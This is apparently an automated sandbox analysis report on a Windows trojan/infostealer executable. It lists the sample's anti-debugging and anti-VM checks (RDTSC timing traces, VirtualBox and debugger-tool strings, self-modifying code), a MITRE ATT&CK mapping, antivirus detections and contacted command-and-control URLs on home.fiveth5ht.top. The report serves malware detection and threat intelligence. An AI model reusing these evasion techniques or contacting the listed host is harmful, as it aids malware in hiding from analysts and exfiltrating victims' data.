Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E1225 second address: 71E1229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E1229 second address: 71E123A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+18h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E123A second address: 71E123E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E123E second address: 71E1244 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E1244 second address: 71E124A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E124A second address: 71E125B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+1Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E125B second address: 71E1261 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E1261 second address: 71E1267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E1267 second address: 71E126B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E126B second address: 71E12C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+1Ch], eax 0x0000000b jmp 00007FDD79156833h 0x00000010 mov eax, dword ptr [esi+20h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FDD79156834h 0x0000001a sub ax, DFE8h 0x0000001f jmp 00007FDD7915682Bh 0x00000024 popfd 0x00000025 mov bh, al 0x00000027 popad 0x00000028 mov dword ptr [edx+20h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FDD7915682Eh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E12C9 second address: 71E1329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+24h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FDD78DE46B4h 0x00000013 jmp 00007FDD78DE46B5h 0x00000018 popfd 0x00000019 jmp 00007FDD78DE46B0h 0x0000001e popad 0x0000001f mov dword ptr [edx+24h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FDD78DE46AAh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E1329 second address: 71E1338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD7915682Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E1338 second address: 71E1350 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD78DE46B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E1350 second address: 71E1354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E1354 second address: 71E1380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+28h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FDD78DE46B8h 0x00000013 mov ecx, 6A8237D1h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E1380 second address: 71E13B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD79156837h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+28h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDD79156830h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E13B2 second address: 71E13B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E13B8 second address: 71E13BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E13BE second address: 71E13C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E13C2 second address: 71E13C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E13C6 second address: 71E141E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [esi+2Ch] 0x0000000b jmp 00007FDD78DE46B4h 0x00000010 mov dword ptr [edx+2Ch], ecx 0x00000013 jmp 00007FDD78DE46B0h 0x00000018 mov ax, word ptr [esi+30h] 0x0000001c jmp 00007FDD78DE46B0h 0x00000021 mov word ptr [edx+30h], ax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FDD78DE46AAh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E141E second address: 71E142D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD7915682Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E1566 second address: 71E1588 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov edi, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FDD78DE46AFh 0x00000014 movzx ecx, di 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 7230C34 second address: 7230C84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD79156831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FDD79156833h 0x00000013 sbb ecx, 7F5D23DEh 0x00000019 jmp 00007FDD79156839h 0x0000001e popfd 0x0000001f mov edx, esi 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 7230C84 second address: 7230C8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 7230C8A second address: 7230CE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FDD79156830h 0x00000010 and eax, 073B1B08h 0x00000016 jmp 00007FDD7915682Bh 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f movsx edx, cx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushfd 0x00000025 jmp 00007FDD7915682Ah 0x0000002a jmp 00007FDD79156835h 0x0000002f popfd 0x00000030 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 7230CE0 second address: 7230D1C instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FDD78DE46AFh 0x00000012 xor al, 0000005Eh 0x00000015 jmp 00007FDD78DE46B9h 0x0000001a popfd 0x0000001b push ecx 0x0000001c pop edi 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71C0F74 second address: 71C0F7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71C0F7A second address: 71C0F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71C0F7E second address: 71C0F8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71C0F8D second address: 71C0F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71C0F91 second address: 71C0F95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71C0F95 second address: 71C0F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71C0F9B second address: 71C0FA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 7170007 second address: 717000B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71C08A6 second address: 71C08AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71C08AA second address: 71C08B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71C08B0 second address: 71C08B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71C08B6 second address: 71C08BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 7190D3A second address: 7190D74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 0B5BC834h 0x00000008 push edi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esp 0x0000000e pushad 0x0000000f movsx ebx, si 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 jmp 00007FDD79156838h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e mov eax, 7CA269ADh 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 7190D74 second address: 7190D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 7190D78 second address: 7190D89 instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 and esp, FFFFFFF0h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Special instruction interceptor: First address: B51D7B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Special instruction interceptor: First address: B51E98 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Special instruction interceptor: First address: CF23CE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Special instruction interceptor: First address: CF0F67 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Special instruction interceptor: First address: D04ABB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Special instruction interceptor: First address: D7B61B instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\OoYYtngD7d.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_0047255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,		0_2_0047255D
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Code function: 0_2_004729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,		0_2_004729FF

Source: C:\Users\user\Desktop\OoYYtngD7d.exe

Code function: 0_2_0047255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,

0_2_0047255D

Source: OoYYtngD7d.exe, OoYYtngD7d.exe, 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: OoYYtngD7d.exe, 00000000.00000003.2184310202.0000000001651000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
Source: OoYYtngD7d.exe	Binary or memory string: Hyper-V RAW
Source: OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: OoYYtngD7d.exe, 00000000.00000003.2311427026.00000000016AC000.00000004.00000020.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2329375934.00000000016B5000.00000004.00000020.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000003.2311456523.00000000016B2000.00000004.00000020.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000003.2311335955.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000003.2312585897.00000000016B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
Source: OoYYtngD7d.exe, 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: OoYYtngD7d.exe, 00000000.00000003.2186428330.0000000006A41000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlM!

Source: C:\Users\user\Desktop\OoYYtngD7d.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\OoYYtngD7d.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\OoYYtngD7d.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\OoYYtngD7d.exe	File opened: NTICE
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	File opened: SICE
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Process queried: DebugPort	Jump to behavior

Source: OoYYtngD7d.exe	Binary or memory string: LProgram Manager
Source: OoYYtngD7d.exe, 00000000.00000002.2328059935.0000000000CD3000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: LProgram Manager

Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\OoYYtngD7d.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: OoYYtngD7d.exe, 00000000.00000003.2147343659.0000000007440000.00000004.00001000.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: procmon.exe
Source: OoYYtngD7d.exe, 00000000.00000003.2147343659.0000000007440000.00000004.00001000.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Infostealer behavior detected

Source: Signature Results

Signatures: Mutex created, HTTP post and idle behavior

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.6:49710 -> 5.101.3.217:80

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Process Injection	23 Virtualization/Sandbox Evasion	OS Credential Dumping	741 Security Software Discovery	1 Exploitation of Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	23 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	13 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	216 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
OoYYtngD7d.exe	33%	Virustotal		Browse
OoYYtngD7d.exe	50%	ReversingLabs	Win32.Trojan.Generic
OoYYtngD7d.exe	100%	Avira	TR/Crypt.TPM.Gen
OoYYtngD7d.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lseD	0%	Avira URL Cloud	safe
https://httpbin.org/iphDf	0%	Avira URL Cloud	safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
home.fiveth5ht.top	5.101.3.217	true	false		high
httpbin.org	3.218.7.103	true	false		high

Contacted URLs

Name	Malicious	Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0	false	high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862	false	high
https://httpbin.org/ip	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	false		high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17	OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	false		high
http://html4/loose.dtd	OoYYtngD7d.exe, 00000000.00000003.2147343659.0000000007440000.00000004.00001000.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	false		high
https://httpbin.org/ipbefore	OoYYtngD7d.exe, 00000000.00000003.2147343659.0000000007440000.00000004.00001000.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	false		high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lseD	OoYYtngD7d.exe, 00000000.00000003.2312622916.0000000001642000.00000004.00000020.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2328985503.0000000001649000.00000004.00000020.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000003.2312725633.0000000001647000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/http-cookies.html	OoYYtngD7d.exe, OoYYtngD7d.exe, 00000000.00000003.2147343659.0000000007440000.00000004.00001000.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	false		high
https://curl.se/docs/hsts.html#	OoYYtngD7d.exe	false		high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS	OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	false		high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963	OoYYtngD7d.exe, 00000000.00000003.2312622916.0000000001642000.00000004.00000020.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2328985503.0000000001649000.00000004.00000020.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000003.2312725633.0000000001647000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://httpbin.org/iphDf	OoYYtngD7d.exe, 00000000.00000003.2183946823.000000000165D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/alt-svc.html	OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	false		high
http://.css	OoYYtngD7d.exe, 00000000.00000003.2147343659.0000000007440000.00000004.00001000.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	false		high
http://.jpg	OoYYtngD7d.exe, 00000000.00000003.2147343659.0000000007440000.00000004.00001000.00020000.00000000.sdmp, OoYYtngD7d.exe, 00000000.00000002.2327276994.00000000009E1000.00000040.00000001.01000000.00000003.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
